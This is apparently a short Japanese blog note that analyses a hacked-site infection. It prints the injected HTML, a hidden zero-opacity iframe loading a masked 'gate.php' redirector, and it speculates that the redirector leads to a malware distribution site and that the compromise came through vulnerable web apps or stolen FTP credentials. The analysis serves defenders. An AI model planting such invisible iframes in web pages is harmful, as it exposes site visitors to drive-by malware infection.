qpi pofasdfhg iframe gate.php?f= サイト改ざん
ハッキングされてる普通の一般サイトのHTMLソースの末尾(BODY終了タグの直前)に挿入される不正なコード。前後にコメントアウト「qpi」、DIVタグのスタイルシートのパラメータ「pofasdfhg」、表面上見えないインラインフレーム「http ://●●●●/gate.php?f=×××××」。
<!--qpi--><style>div.pofasdfhg{z-index:-1;position:absolute;left:0;top:0;opacity:0.0;filter:alpha(opacity=0);-moz-opacity:0;}</style><div class=pofasdfhg><iframe src = http ://●●●●/gate.php?f=××××× frameborder=0 marginheight=0 marginwidth=0 scrolling=0 width=5 height=5 border=0></iframe></div><!--/qpi-->
このタグを介して、ウイルス配信サイトがブラウザ内部で読み込まれ、最終的にこのウイルス対策をちゃんとやってないWindowsパソコンは裏で強制的にウイルス感染する仕組み? ダミーの可能性もある「404 Not Found」が常に返ってきて分からん。
普通の一般サイト
↓
リダイレクター (/gate.php?f=×××××)
↓
ウイルス配信サイトへ?
- サーバーにアップしたWebアプリケーションの脆弱性? (WordPress旧バージョン、TimThumb、phpMyAdmin、など)
- このウイルス対策をしてない管理人のパソコンがウイルス感染してFTPソフトからログイン情報引っこ抜き?
(パスワードを生身で保存するFileZilla)